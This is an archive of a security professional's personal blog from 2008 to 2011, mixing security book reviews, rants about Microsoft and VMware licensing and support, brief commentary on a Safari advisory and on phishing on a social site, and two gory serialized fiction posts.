ryanlrussell

Ghost in the Wires

2011-10-07T20:47:00.000-07:00

Ghost in the Wires, Mitnick & Simon

Disclaimer: Kevin Mitnick is a personal friend, and this review is based on a late galley copy. I have no financial interest in this book. The above link is an affiliate link.

I have been reading books about Kevin Mitnick for years. Finally, we get to read the best one yet. All of the previous authors worked from information they could glean, and some limited interactions with Kevin himself. The problem is, he was playing most of them a lot of the time. What we have here is Kevin's own version of his story, written himself, along with his collaborator William Simon.

I'll just jump right in; I loved this book. If you have any interest in real-world hacks at all, read it. The other books and news stories didn't cover half of what he did. As I devoured in in two days, I kept turning to people to say "Read this!" or repeating one of his stories for co-workers.

I have some clear favorite stories, but I don't want to give any spoilers. It's that much like reading a thriller. My favorites are how he defeated the radio encryption used by the FBI, and how he would go about obtaining a new identity. Specifically, how and where he researched the identities, and got the appropriate document papers.

The sheer audacity that some of his tricks took is amazing to me. He admits things in the first few pages that surprised me. And after reading about how things went with his friends over the years, I finally have some appreciation for why he has such hatred of snitches.

Let's be clear, this is not a technical book like others I have read. He doesn't cover how to exploit a stack overflow. When he breaks into a Solaris box, he says "I used a Solaris exploit." He says that the reason for that was to make it more readable for the general public. And I don't think he's incorrect in that. The focus is story and history.

But even if you're a hard-core technical security person, I think you'll like the book for what it is. Unless you think that security begins and ends with writing a cool exploit. Do I think Kevin has technical skills? I do. But those aren't his greatest powers. Yes, he's a fantastic social engineer. And using those skills, he owned more things and companies than probably anyone else. A 0-day exploit that lets you break into a source control server is impressive. But I don't think it's quite as cool as calling up and getting them to just mail you a tape with the source. There's no patch for stupid.

You'll also enjoy the book if you have an interest in computer or security history like I do. It spans several decades, from when he was a kid interested in magic up to almost present day. There are the cameos from other well-known hackers that have had books written about them as well. I have enjoyed reading articles and seeing Twitter exchanges with Kevin and some of his old victims. (All amiable so far as I have seen.)

If you want the most accurate version of the Mitnick story available, here you go.

Gmail uptime

2010-04-14T10:43:00.000-07:00

My manager at BigFix was having a discussion with our CFO about Gmail uptime (in the context of our email infrastructure uptime.)

Using this as a data source:
http://www.google.com/appsstatus#hl=en

and selecting Google Mail and Postini Services at the items to measure, he arrives at this:

Date	Service	Duration	Reason
4/9/2010	Postini	2:24	Unspecified Emergency Maintenance
4/7/2010	Core Gmail	11:20	HTML mode email down for "a small number of users"
4/2/2010	Postini	2:08	Failed Postini update
3/16/2010	Core Gmail	9:51	Inbound/Outbound Email was not routing
3/15/2010	Core Gmail	4:38	Users unable to access gmail accounts
3/10/2010	Core Gmail	0:50	Users unable to access gmail accounts
3/8/2010	Postini	0:29	Anti-Spam not anti-spamming
3/4/2010	Postini	0:58	Anti-Spam not anti-spamming
2/25/2010	Postini	7:46	Users unable to send email
		40:24

Total runtime (2 services) 2304
48 days, 24 hrs day, 2 services

Effective uptime
98.24%

I have not done my own math here to verify, just thought it would be interesting to share. Note that he gives them twice as many runtime hours since he's counting two services. I would tend to halve that, resulting in double the downtime percentage.

I thank Google for publishing their outage information, by the way.

Just a data point for the next time someone is asking you for more nines than is reasonable.

Contradiction

2010-03-19T13:53:00.000-07:00

"They are all correct."

"How could they ALL be correct? They contradict each-other. You can't have Heaven and Valhalla be the afterlife. If Heaven exists then that means that Valhalla doesn't. And vice-versa."

"Think of it as parallel universes."

"But doesn't the idea of a God transcend multiple universes? Isn't God the god of all universes?"

"Yes."

"And so is Zeus?"

"Yes. Infinite, parallel parallel universes."

"Which universe is Earth in?"

"Earth is Earth. The afterlife is different. It is when you change over."

"So if I'm from Earth, which one do I go to?"

"It depends on what you believe. You determine where you go, when you cross over."

"So if I believe in Judeo-Christian Heaven?"

"Then you go there."

"But what if I believe in that, but don't think I lived well enough?"

"Then you go to Hell."

"Does that mean there isn't a God?"

"All of the gods are. You go to the one you believe in."

"What if I believe in reincarnation?"

"Then you will be reincarnated."

"On Earth?"

"On an Earth, yes."

"What about the atheists?"

"They cease to be."

"That doesn't seem fair. They die?"

"It is what they believe happens. It is what they cause to happen."

"So if you don't have faith in something, you die?"

"Faith is not a belief in what might happen. It is what happens. It causes it to happen. If you believe death is the end of your existence, then it is so."

"So where would I go?"

"What do you believe?"

"I don't know, really. I believe... or maybe I hope something happens. I always had a hard time believing one church was right and that the others were wrong. Or that any of them were right. I guess I figured I would find out when it happened. I hope I will have a chance to figure it all out afterward."

"That is how you ended up here."

Fixer-Upper

2009-11-29T19:31:00.000-08:00

Continued from Welcome Home

The sunlight disappeared again, and he assumed he was wheeled into a building. He felt several turns and a jolt that he thought must have been his gurney being shoved through a swinging door. He came to a halt, and another bright light painted his face sheet. Very artificial light.

The sheet was pulled away. More surgical masks this time. There was an overhead light on an articulated arm. Buzzed, muffled voices, one of the masked individuals gestured at the light to another. The latter grabbed a handle on the side of the light with a gloved hand, and aimed it directly into his face, forcing him to squeeze his eyes closed.

He felt latex-covered fingers prodding his head and neck. A shadow fell over his face, and he opened his eyes to see a masked face with plastic glasses leaning over his, looking into his face. He assumed the face belonged to a surgeon. The mask, glasses, head cover, gown, mostly blue paper said medical to him. The surgeon's head was blocking the flow of light. He could see the surgeon's jaw moving behind the mask, looking at him, talking to him, but all he could hear was the buzzing, muffled sounds. The surgeon gave up, and shook his head "no" to someone beside him.

The head withdrew and the bright light shut his eyes again. The probing fingers returned, concentrating on his neck. They pressed hard, causing him to flinch from the pressure. Down the side of his neck they poked, until they were partway down his shoulders, where the poking was replaced by a slight pressure or tugging. This was repeated multiple times on each side. Poking hard enough to get a reaction higher up on his neck, and then gentle pressure as they went further down his shoulders.

He felt fingers at his ears, pulling them in different directions from the outside. He didn't feel them extract whatever had been shoved into his ears that kept him from hearing, but they inserted something cold and hard into his right ear. His ear was still numb and the sound was muffled, when he felt a sudden stabbing pain in his ear. He instinctively tried to jerk, but the movement was truncated by the screws that still held his head in place. It didn't stop the stars of pain from lighting up his closed eyes.

While he was concentrating on stilling himself, the intensity of the light on his face abated. He opened his eyes and blinked away the tears. Looking up, he saw the light was aimed further down his body. He tried to follow with his eyes, but he was lying flat, and there were tubes at his nose and mouth partially blocking his view. He could see the surgeon's side near his face. The surgeon was bent over his body.

He watched the surgeon take several scalpels in a row, and bend low over him each time. Each time, he would place the bloody scalpel on a tray. He couldn't feel any pain. He realized that he must have been heavily drugged most of the time for days, which is why he couldn't move and was so foggy.

He didn't have any memory of his capture or injuries. He didn't know who had him, or if they were the ones who did this to him. He had eliminated the possibility that it was just medical personnel. Hospitals don't use military transports, and they don't keep you moving for days before they operate. Unless he dreamed all of that. Unless he'd already received some treatment. But he couldn't have dreamed all of it. He knew they had found him.

Next the surgeon grabbed some kind of big pliers or clamp. He saw that they opened when the handles were squeezed as the surgeon flexed them. He must have left them in place, because he stood up empty handed. He was handed what looked almost like a soldering gun, but when the surgeon pulled the trigger, he could see a small blade vibrate at the end, almost like a tiny skillsaw.

His eyes went wide when he realized that it was a sternum saw, and that his chest was being cut open. His eyes went wide, and he tried to thrash. The panic made him able to ignore the pain as he writhed and his eyes rolled in his skull. The surgeon stopped momentarily and motioned in his direction with a tilt of his head. From behind, he felt a needle insert into his neck. A slight burning spread up the blood vessel in his neck. The needle was withdrawn, and they unceremoniously dropped the sheet back over his head box.

As he sank down below consciousness, he thought "why are they keeping me alive?"

Welcome Home

2009-11-23T15:43:00.000-08:00

I thought I might experiment with some serialized fiction on my blog. I'm trying a slightly different style. I'm going to attempt to be a little gory and disturbing so if that bothers you, fair warning. I'll have a tag for these posts later.

-- end author's note

The jolt from the helicopter landing shook him into awareness. Another stab of lightning shot through his head and made his vision go white. Water leaked from behind his eyelids, squeezed tight from the pain. He knew it was a helicopter from the vibrations of the rotors. He had spent a little time on helicopters in his 20's.

He couldn't tell if it had been days, or a week, or more. He spent much of the time unconscious from pain or drugs. Or not being able to tell the difference between real and imagined. Rarely, he could catch a blurry glimpse of the inside of an ambulance or plane when they would remove his head covering to work on him. If he didn't have an overhead light blinding him.

Every face he caught sight of during this time was covered with a mask. These ranged from baby-blue or white surgical masks, to Army green and SWAT black gas masks.

He could tell words were being spoken all around him, but was unable to understand them. Not because they weren't English. He thought they were, from the rhythms of the words. He couldn't understand because they had shoved something in his ears days ago and left it there. Words came to him as a buzzing, scratchy sound. The loudest thing in his head was a constant tone, like an old modem trying to sync. He could "hear" the helicopter blades as a vibration in his skull. His ears hurt, but the pain level barely registered above the symphony of hurt that was his head.

Frightening to him, it was only his head that hurt. He had been able to see down his body twice. Each time, covered and strapped down. The whole time he was in custody, they had him strapped down to a gurney. He thought he had moved his arms and legs a few times while strapped down. Simultaneously light and drug-deadened.

Tubes ran through his mouth and nose. A machine pumped air in and out of him. He could feel temperatures and pulses slide through the tubes. His head was caged in a scaffold of bars, forming a box. At odd angles to the box were long, spiked screws that drilled directly into his skull, immobilizing him. The entire box was draped with a sheet.

Shadows across the sheet indicated that there were men at the sides of his gurney. It started to shake, and then it felt like he was rolling. He imagined fabric straps being release from the floor and walls and his wheels being unlocked. He was rolled towards what must be the helicopter door, and hoisted by his pall bearers. He floated through the air briefly until his wheels made contact with ground again. There was a qualitative difference between rolling on the steel floor of a vehicle and the rough pavement or concrete he rolled on now.

As he rolled, the shadow line suddenly crossed his sheet, and bright light illuminated his covering. He could immediately tell the sunlight from the artificial lights he'd been under. The warmth and color were unmistakable.

It was the last time he would ever see sunlight with his own eyes.

Concept Art

2009-05-11T21:22:00.001-07:00

Some concept art for a project I'm working on with my oldest son. He's the artist, not I.

The Mac Hacker's Handbook

2009-05-11T20:22:00.000-07:00

The Mac Hacker's Handbook is the best reference for Mac-specific attack information that I have found. At 368 pages, it may appear small compared to the typical 750+ page security tome. That's because the authors have done a near-perfect job of sticking to the topic at hand, the Mac. The authors do not succumb to the usual temptation to try and teach assembly language or reverse engineering. Rather, they do an excellent job touching on those topics in an OS X context, and assume the reader has a little background in that area already, or can otherwise keep up. I have done some limited research into the areas of Mac malware and process injection in the past. This book has done a fantastic job of filling in many holes in my knowledge that I hadn't been able to take care of before. Plus, it introduced me to a number of Mac-specific security features I wasn't aware of before. Highly recommended for anyone interested in Mac security.

Detailed commentary follows.

The authors Charlie Miller and Dino Dai Zovi have impressed me on several levels.

A couple of years ago, I did a presentation of Mac malware, where I researched some similar areas on my own. The purpose of my talk was to demonstrate that the privilege separation on a typical single-user OS X box made no difference, because an attacker could do everything they need from user mode.

My skills are somewhere between beginner and intermediate in the areas of programming, reverse engineering, vulnerability research and exploit writing. With a lot of work, I was able to create a very crude keyboard sniffer by attaching a library to launched processes. In one chapter (chapter 11), this book spelled out everything I needed to know and more. And implements several useful injected components in a much more flexible way than I was able to. I could have really used this information then.

I ran across many of the same libraries and examples that the authors reference in the book. However, they were mostly code examples with no context, intended to be groked by hard-core Mac programmers. Here, they are presented in an actual understandable way, building on examples as they go. It makes a huge difference. The level of writing meshed perfectly with my past knowledge and filled in the holes I had. I have an advantage over a rank beginner, but I suspect they have reached as wide an audience as is possible with their writing.

They do this consistently throughout the book. And this is what really made this an excellent book for me, was the actual writing. You'll have to excuse me if I geek out a little bit on this topic, but I've written a few technical books myself, and I have a great appreciation for how hard it is to do this well.

There are many traps one can fall into when writing a book like this. A lot of the topics are circular. As in, it's difficult to pick a sane order to follow, and not repeat a lot of information. There's always a temptation to try and show off advanced topics, and not adequately cover the intro material. It's easy to get lazy and not put the time into explaining a concept, assuming everyone knows it. Authors sometimes dump a lot of pictures and code on the reader for length.

These authors fell for none of these. The ordering of topics and advancing difficulty seem ideal. Code is almost uniformly useful and well-documented. They don't beat you over the head with example after example for the same topic. Rather than attempting to include a complete PowerPC and x86 instruction reference, they give you the minimum set of instructions that they used. The pacing was great. I was neither bored reading things I knew, nor unable to keep up with the material (until I struggled slightly to absorb the last chapter or two.)

Production values are good. The price is great, the length is very appropriate. Editing is good. (Not perfect; I spotted a dozen very minor typos. But then, I can't turn off my internal proofreader anymore, you're unlikely to notice most if any of those.)

There are other minor things to appreciate if you've been around vulnerabilities and exploits for a while. I feel like they did a great job explaining heap exploitation, compared to other attempts I've read. I very much enjoyed the little bits of history when they discuss who pioneered a particular technique. Most of Dino's code has a date in the comments, so you have some idea what was known at the time.

I'd go so far as to say that this book really is a general book about how to find and exploit vulnerabilities, using the Mac as your research platform. And it turns out that the Mac is a great place to learn.

Hey! You! Get off of that cloud!

2009-04-02T00:02:00.000-07:00

Or Microsoft won't support you.

We've had an interesting several days dealing with Microsoft at work. BigFix recently signed an Enterprise Agreement with Microsoft, where we committed to X licenses of the workstation OS, and put a number of other things under Select Agreement, including Server OSes, Exchange, SQL Server, MSDN subscriptions, and so on. This came with a few free support calls.

Our OS X and iPhone users (in particular, our CEO) have been anxious to get on Exchange 2007 for the rumored improved Entourage and iPhone support around calendars. So when our CFO wrote the large (for us) check to Microsoft, the IT Team committed to implementing Exchange 2007 in an aggressive time frame. Currently, we're using Exchange and OWA 2003.

Doing some research, it looked like the best option was to build new Exchange and OWA machines and migrate mailboxes. It also looks like the best OS choice is Windows 2003 Server Enterprise 64-bit. We read some documents that indicate Exchange 2007 isn't fully supported on 32-bit Server, and has only just been qualified on Server 2008.

We put Exchange itself on physical hardware for performance reasons. It's probably not really necessary, but we're being conservative. We used a Dell 2850 with about 1TB of disk and 32GB of RAM that was a VMWare ESX server until I replaced it with an even larger Dell R900. It's running Windows Server 2003 Enterprise R2 64-bit. The OWA machine doesn't need any particular performance characteristics though, so we decided to put it on a VM. It's on the same OS. No problems running 64-bit guests, by the way. We do it all the time.

Like many companies, we're trying to virtualize a lot of our infrastructure. We've made a fairly large investment in VMWare's enterprise products for a company our size, especially in our Engineering organization. I won't get into the benefits here, but for us they are substantial, and our entire disaster recovery plan is tied to VMWare ESX.

Things were on schedule with the Exchange 2007 configuration. In the interest of time, we had made one support call to Microsoft for install problems on the physical hardware. It burned the equivalent of $299, but for our schedule, it was easily worth it. Exchange was working.

We ran into a second issue with OWA 2007. My sysadmin was having trouble getting Outlook Anywhere to work correctly with Outlook 2003 and Entourage. He called again. This time, while the Microsoft support engineer was remote into our OWA server, he saw VMWare Tools in the Add/Remove Programs list. He asked, and we said yeah, it's a VM.

He said he could not support us, closed the ticket, and advised us to rebuild on physical hardware and call back. The support engineer also said that if we had had Premier Support, that he could "Look into it." He cited this article: http://support.microsoft.com/kb/897615

I'll summarize it: Microsoft only supports virtualized Windows and MS apps if you use Microsoft virtualization software.

That had never occurred to any of us in the IT department. That policy is so ridiculous as to defy belief.

I complained into the air on Twitter. I got two categories of response: Lie to Microsoft Support, and No, they do support it. It's called the SVVP.

Sure, we're willing to lie to support. We just didn't know it was necessary, and we got caught this time.

By the way, I'm going to jump ahead in the story for a moment and say that yes, we did rebuild OWA on physical hardware and call back. And it turns out that the problem was on the Exchange server, NOT the OWA server. So no, it's not possible that VMWare was a factor, and yes, we did waste days and slipped our schedule for no good reason. I say this mostly to save you the trouble of trying to fix my technical problem, it's already done.

And of course, that's not the real issue.

During these several days while my sysadmin gave up and build a physical box to appease Microsoft Support, the rest of us were complaining bitterly to our Microsoft sales rep. We still could not believe that they really intended to have that as a policy. He insists that they did. He knows, because he has had "lots of customers complain about it."

What about the SVVP, I asked my sales rep? Both a Microsoft employee and a VMWare employee pointed out to me on Twitter that ESX IS supported. Nope, my sales rep says that's only for the Windows OS itself.

But wait, the VMWare guy pointed out to me that Exchange on VM is specifically covered under the SVVP. Surely this means I'm good, right? This is just a case of Microsoft Support not being up on the latest Microsoft policies?

Nope. That article only covers Exchange 2007 SP1 (good) on SVVP virtualization software (good) on Windows Server 2008 (bad, I'm using Server 2003.)

So yes, they STILL turned me down for support on ESX. But they would support all of it if I was using Hyper-V.

This is far worse than my little problem not being handled. This would seem to indicate that Microsoft intends to qualify every single app they produce as being covered on VMWare or not. And only the versions that they feel like. And only if it's on a Windows version they want to cover.

So the latest set of articles on how to tune SQL Server 2005 on ESX? Forget it. It's not supported.

It's really hard to not immediately leap to accusing Microsoft of more anticompetitive behavior and vendor lock-in for their own virtualization technology.

Does Microsoft qualify every individual app on the hardware in the supported hardware list? Of course not. If the OS works, the apps should work. That is the basic job of the OS, yes? To abstract the hardware for the apps? So if Microsoft has qualified Windows 2003 on ESX, why should they decline to support OWA on it?

Is there an Exchange 2007 SP1 supported hardware list somewhere I'm not aware of?

At my most generous, I can assume that Microsoft Support is just not aware of Microsoft's own policies on this topic. And Microsoft Sales isn't either. My rep still says he can't help me. I can even see wanting to qualify Microsoft OSes on ESX "hardware", just like they would on Dell or HP. (Though when is the last time Microsoft Support even ASKED you what hardware you're running on?)

But to try and take a policy that every app needs to be qualified individually, down to the service pack level? Unless you're on Microsoft's virtualization technology?

That's just quite possibly criminal.

Twitter

2008-08-04T11:48:00.000-07:00

Twitter:
http://twitter.com/ryanlrussell

Tweet, or something.

MyYearbook

2008-07-21T12:08:00.000-07:00

I've been wasting a bunch of time on MyYearbook.com, a MTWWTOSNS (massively time-wasting web-two-oh social-networking site.) If you'd like to descend into madness with me, click here join join for my personal gain:
Be Ryan's Friend

Several interesting aspects to this one, for security people. First, the are many sociological aspects. For example, what happens if you tell people they can't post naked pics? Second, there is a play money currency, which drives everyone's behavior. Finally, they are getting phished left and right from within the site.

And the staff there appears to be so woefully unprepared to deal with it. When I saw the phishing, I thought I might mail their abuse contact info (only email address I found published), and see if they needed info, if I could put them in touch with a takedown group, etc. I got bounces from gmail. Um, your abuse email at your own domain depends on gmail?

The site is absolutely begging for someone to start using XSS. The game model they have basically demands it. For example, your popularity depends on profile views. And I can post a pretty wide range of HTML to someone in about 20 different ways. I haven't tried to see if I can find any XSS. Mostly because I don't trust myself not to abuse it.

But my favorite thing about MyYearbook that I just realized, while sitting in JFK coming back from HOPE. This site is teaching millions of people how to do simple HTML. And nearly half of these people are below average intelligence.

Edutainment, indeed.

Politics, $8.34 worth

2008-07-18T23:10:00.000-07:00

This post is about politics, which I normally would avoid. But humor me this one time.

Click on the pic to have your geek heartstrings pulled. Short version: If he's willing and able to put this up, that's all I need to know. Don't care if he's pandering.

Yeah, I gave him $8.34.

Long version: Doesn't matter if he's in Kansas, I want people like this to succeed. Doesn't matter if I agree with all of his policies, you never get a candidate that matches exactly, and you can't count on them to implement them once in office. Plus, he appears to be able to change his mind based on feedback, holy crap.

If you want more candidates like this, consider giving him the token donations (US only), and blog him up.

HOPE

2008-07-15T21:17:00.000-07:00

I'll be in NYC for HOPE, starting tomorrow. Any of you going to be there?

Little Brother

2008-06-08T14:26:00.000-07:00

I just finished reading Little Brother by Cory Doctorow while on a plane to Seattle for a Windows Secrets meetup.

There are a few audiences one might rate this book against. Probably the only fair one is the one Cory wrote for, young adult readers who need an introduction to electronic civil rights (and civil rights in general, for that matter.) For that audience, I think he has succeeded admirably. I will make my copy available to my kids, and see if any of them have an opinion.

To be sure, the book tries to indoctrinate readers to the cyber libertarian way of thinking. Since I happen to agree with that doctrine, I have no problem with that. (And yes, I gave up fighting the use of "cyber". I lose.)

Another audience I might rate this book against is the one I put myself in. Middle-aged infosec people. Perhaps with a little amateur writer thrown in. I still recommend the book, but now I have to start breaking out caveats and picking nits.

Spoilers ahoy.

First off, how's the tech? This is a sliding graph. Compared to the vast majority of the books in the world, Cory's technical accuracy is quite high. There are extreme ends of this scale. For example, Dan Brown (The Da Vinci Code author) writes with basically zero tech accuracy. Amazingly good, page-turning drama. Horrible tech. So Dan's down at the great writing, lousy tech corner.

If I may give my ego a backhanded stroke for a moment, I place myself up at the opposite corner. In the Stealing the Network series, I went way out of my way to make my tech 100% accurate. I also acknowledge that my writing probably sucks, so I like to think of myself as the anti-Dan Brown. Mercifully, my books are shelved in the Computer section of book stores.

Cory's writing in Little Brother is good and his tech is very good. (For a not-specifically tech, non-hacking book). So he's in the upper-right quadrant of the graph.

But of course I'm compelled to point out specific problems. Cory sacrifices some accuracy for plot in a few key places. And appropriately so, I think. The plot flows better this way. Biggest example is the RFID rewriting. The majority of the tags are not rewritable. Cory has kids running around doing non-contact rewrites of FastTrak and other cheap RFID tags. Doesn't work in real life. Nor, I believe, in the near future.

Speaking of time, I can't recall spotting anything in the book that would indicate a specific year. I'm sure that's intentional. I've had my books described as being 10 minutes into the future. I think Cory's at 60 minutes. It reads like now plus 5 to 10 years.

Cory's writing also snags in a few places. (Keep in mind, just because I can spot someone else doing it doesn't mean I can avoid doing it myself.) One of his purposes is to instruct. He doesn't assume the reader knows what an RFID tag is in the first place. This is where there's a big difference between random YA reader and someone like me who has been doing security for years.

For me, he's way over-explaining, and the story grids to a halt. It's mostly first-person, and so are the explanations. But the first person goes from being aimed at someone in the story to being aimed at the reader. It's as if the main character turns to look straight out of the page at you. For someone who knows these things, it's like saying "money can be used for goods and services." So this lessened the enjoyment of the story aspect for me somewhat. But again, probably a tradeoff he made.

I also am already caught up on all the technical and political aspects the book covers, so I didn't learn anything new there. But then I read Boing Boing, was around when the EFF was founded, have been going to various hacking conferences for over a decade, and know half of the people Cory used for source material.

In my case, that leaves the story. On to the parts I did like. I find the overall plot, sadly, believable. It's almost entirely set in San Francisco and the Bay Area, where I live. So he gets local color points. He came up with a number of characters I care about. He made me angry about what was happening in the story. After the first couple of chapters, I had to spend all my spare time reading it.

Let me see if I can help you categorize yourself as a person who would agree with the politics of this book, and would be ok sharing with a YA reader. Do you get mad every time Thomas Hawk links to a story about a photographer getting hassled by the police or a security guard? Do you want to call up and scream at a school board or principal when Fark links to a story about some kid getting expelled for a t-shirt or haircut? Do you have nothing but contempt for the TSA every time you find yourself removing your shoes at the airport?

If the answer is yes, then you will probably "enjoy" the plot and be right on board with the political implication. Be prepared to spend the first half of the book angry.

You know what else I liked? Cory didn't shy away from the other points of view in the discussion. He goes ahaead and points out how his main character is just like a terrorist. He gets screwed over by his parents for most of the book. Some of his own friends give up on him. Some of his trusted circle betray him. He doubts constantly. He suffers for it. It's not like Cory's position still isn't clear, but I appreciate him exposing all the costs.

The big moral of the story is that intrusive government sucks. But the smaller moral is that you have to stand up for your own rights, and it's going to hurt.

Little Brother download page
Little Brother posts on Boing Boing
Cory's review of one of my books (seems only fair)

Race to Zero

2008-05-31T10:27:00.000-07:00

The Race to Zero contest.

So, people are going to write some new packers? OK, no problem then.

Is Microsoft dropping Apple 0-day?

2008-05-30T21:43:00.000-07:00

Just saw this link show up in my RSS reader:
Microsoft Security Advisory (953818) Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform

From the advisory:

FAQ

What causes this threat?
A combination of the default download location in Safari and how the Windows desktop handles executables creates a blended threat in which files may be downloaded to a user’s machine without prompting, allowing them to be executed. Safari is available as a stand-alone install or through the Apple Software Update application.

And

Workarounds
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.
•
Change the download location of content in Safari to a location other than ‘Desktop’
Launch Safari. Under the Edit menu select Preferences.
At the option where it states Save Downloaded Files to:, select a different location on the local drive.

So... that sounds a lot like if I were to download a desktop.ini file or something like that, I'd get my Windows all 0wned. As in, if I cared to, I probably wouldn't have to work too hard to figure out how to exploit this from Microsoft's description and workaround.

Is this being exploited in the wild or something? Otherwise I kinda would have expected Microsoft to keep quiet until it was patched by Apple.

I guess Apple pushing Safari on Windows iTunes/Quicktime users isn't looking so hot about now?

Update:
Aha, pointer from Slashdot and The Register. The carpet bombing seems to be the genesis, but that's not the whole story, since he doesn't talk about executing code.

Update2:
There it is, it was found by Aviv Raff.

Tweaking content (administrivia)

2008-05-03T14:06:00.000-07:00

I have a tendency to write full essays, and only when I'm aroused enough to spend the time, and then only when I can afford the time at that moment. I've also avoided more personal and trivial stuff, because the blog is part of the Security Blogger's Network and because most of you read this because of security-related things.

Well, those are problems that have an easy technical solution. I've created a security-only feed. If you only want the security-related stuff (things I tag "security"), then change your subscription to this feed.

If you want all the other crap I decide to come up with, continue to use the full feed.

I titled the blog "ryanlrussell", I planned to have it be an egofest from the beginning, I just got sidetracked. So what have I been holding back on? Attempts at short fiction, things about my kids, other technology stuff, more things I want to keep a pointer to, and so on. You know that thing that thing that bloggers do that people complain about where they just point to some article and have a short comment without a lot of insight and value add? I'm going to do more of that.

There will be a tsunami of content. Relatively speaking. Prepare for boarding.

I'm going to go tweak old posts, which I'm sure will cause old articles to hit your readers again. Apologies in advance. Should be mostly a one-time thing.

Arr! VMWare is driving me nuts.

2008-03-22T15:27:00.000-07:00

Several random VMWare things I want to throw out there that bother me.

At this point, I have used and continue to use most of VMWare's products. This started with Workstation back to 3.x.

Oh, at let me get my biases out of the way; I run a QA department, and we use VMWare for everything we can. Nothing better than being able to restore to a know state or save off a machine exactly where it is when exhibiting a problem. BigFix, where I work, also makes an agent that runs inside the management partition on ESX 3.x boxes.

VMWare Workstation - Great product, great price point. You can run multiple machines (a few), manage whole snapshot trees. Only really useful if you're in front of the box Workstation is running on. Gets the bleeding-edge features. VMs running under Workstation don't perform great, but are adequate if you give them enough physical RAM. Pretty much exactly matches expectations, but then it's the first product and is the one the others vary from. So in a very real way, this is what sets my expectations for the other products.

VMWare Server - The first larger VMWare purchase I made was GSX Server, somewhere around $3,000US for the software, and a $6,000 Dell 2U running Windows to put it on (BigFix's money, not my personal budget). Not bad, performance is still not great, slightly worse than Workstation. Might be because of remote access latency. Shareable, remote access built-in, which is key. Only one snapshot though, which is an immediate problem. I can manually backup machines at the expense of 30 minutes instead of 60 seconds, and disk space per copy is the same as the original rather than a fraction like a snapshot. But I found I could have a library of 30 machines, and run around 15 simultaneously, depending.

I originally assumed they had just left it out of GSX so far... or maybe, that was their hook to get people to go to ESX? I hadn't looked into ESX yet at the time. It's not a casual evaluation. That's about when VMWare made Server free. Hey, great right? No. There go my hopes of ever getting multiple snapshots on Server. Because VMWare would be insane to put that feature in the free product. For someone in my position, multiple snapshots are probably 40% of the advantage of ESX over Server. And I use ESX now, so why do I care? Because I can't give up Server! I have to keep using this intentionally crippled product. I'll get to why in a sec.

VMWare ESX Server (family) - At this point BigFix has standardized on ESX for as many QA machines as possible. (We have stuff that runs on Mac, Solaris SPARC, AIX PPC, HP-UX PA-RISC and Itanium, Windows Itanium, Windows Mobile on ARM. The x86 virtualization doesn't help much on those. It could with Mac, but Apple only just recently allowed OS X Server on VMs. When I'm trying to qualify our product on OS X, I can't go the hackintosh route. Also, I have a DLP product and some Wake-on-LAN functions I need real machines for. Oh, and I have an agent that runs IN ESX. I can't run ESX in ESX....)

But back to what I LIKE about ESX for a sec. It's the fastest of the bunch, scales better, has better remote access, better machine cloning, migration between physical ESX hosts and drives, and has MULTIPLE SNAPSHOTS. I put my team on ESX, and some of the install matrix stuff instantly takes half the time because of the snapshot feature alone. There's also a almost real infrastructure management. For my purposes, this means I get all my VMs in one window with one login. If you have more than one Server, then you log into each one separately (as far as I know. More on that in a sec, too.) I have as many as 30-40 machines running simultaneously per physical ESX box, out of a library coming up on 100, and it does a fantastic job at resource sharing the 8 cores and 16GB of RAM per physical box. It loves it some disk space, but that sort of thing happens when you build a hundred VMs averaging around 10GB each.

Sure, it's a little pricey. I think I'm paying $3000-4000 per ESX box, plus something for Virtual Center, and I'm not sure what else. I'm buying $9,000 Dell 2Us now, because ESX can actually make us of the resources. And I'm in for an external Dell SATA drive array, 15 400GB drives RAIDed, giving my 1TB on one ESX box, and 1.4TB on the other ESX box. I think we paid $15,000-$20,000 for that. I get less clear on the costs at this point, because I can now just budget for more capacity, and my IT department is buying it. We're in the process of picking on a 40TB SAN for the big cutover, where I bring some other groups into production on ESX who have been suffering with Workstation and piles of external 500GB USB hard drives. We have a tiny bit of production virtualization that VMWare constantly touts, but 90% of my ESX use falls under QA-style use.

Great, right? So one day, I grab the VMWare Converter tool (awesome tool!) to convert the last of my Server images over to ESX... and it balks. OK, no big deal.. I can make them again, they're just a few Win9x boxes, some Solaris x86 10... Hey, the Win9x OSes are missing from the list of standard OSes in the UI. I do some digging, and...

Windows 9x is not supported on ESX.

What? That can't be right... do some investigation... supported on Workstation... supported on Server. Not supported on ESX.

The Solaris x86 10 doesn't seem to work so well on ESX either, though support is claimed. But only starting at a particular patch level. Uh, I kinda need to test compatibility all the way back to no patches, guys. But I haven't finished my heroic effort getting it running on ESX yet. (Not that I should have to work that hard, of course.)

So in one shot, ESX has now forced me to maintain some number of Server machines. Sure, I already had to have piles of physical boxes for the random non-x86 unices. But I was so close on the Win9x. It should work. VMWare just doesn't want to. Can I have multiple snapshots on Server? No. Can I have Win9x on ESX? No. And I can't pay them for it, they don't want to.

While I'm complaining, there's one more thing I don't like about ESX (besides the usualy incremental stuff). I have no idea what the various ESX pieces do, or if I have them, or if I want them, or what kind of setup I need for them. I know I have ESX, Converter, and Virtual Center. I think I want VMotion. I think it does cool stuff with automatically balancing loads and migrating machines. I think I need a SAN for that. I sure hope my IT guy who spec'd that and the SAN out has it straight. I think there are bundles that have some of what I want. And I don't know what else I'm missing.

Like, I have Virtual Center. Does that help with my requirement for Server still? I don't think it does. I could be wrong. There's some ACE authentication product or something too, right? Why would I want that? What does it do?

Why did you buy Determina?

Now, if you actually know what you're doing with VMWare, you are assuming I haven't done my homework and haven't been to training and haven't been reading the docs and whitepapers. And you're right. But I'm the customer. I have entitlement issues. I define good products as ones that I can figure out without much work, that don't make me read the docs. I've been doing this for 25 years now, I like it this way. If I have to read your docs, then I lose for some reason. So when I can't figure out your product line a differentiation, that's ultimately our fault and you have made me bitter and/or sold me less. Make it simpler.

And then when I HAVE figured out your product differentiation when you didn't really want me to (i.e. your artificial limitations), that's not so hot either.

OK, I feel better thanks. And yes, for those of you who actually know the VMWare stuff in depth, PLEASE correct me.

BTW, what brought on the rant? I've got a presentation next week on malware analysis. I need Windows for that, and I'm carrying around a MacBook Pro with Leopard lately. So I bought a copy of VMWare Fusion straight from VMWare for about $70 yesterday. That's about half the cost of Workstation (Windows/Linux host only.)

It only does single snapshots.

